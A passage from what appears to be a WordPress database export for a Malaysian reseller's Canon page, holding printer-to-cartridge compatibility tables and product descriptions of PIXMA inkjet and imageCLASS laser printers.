</td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:01:56','2019-09-24 08:01:56','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3300,1,'2019-09-24 16:06:03','2019-09-24 08:06:03','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>Â </p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td 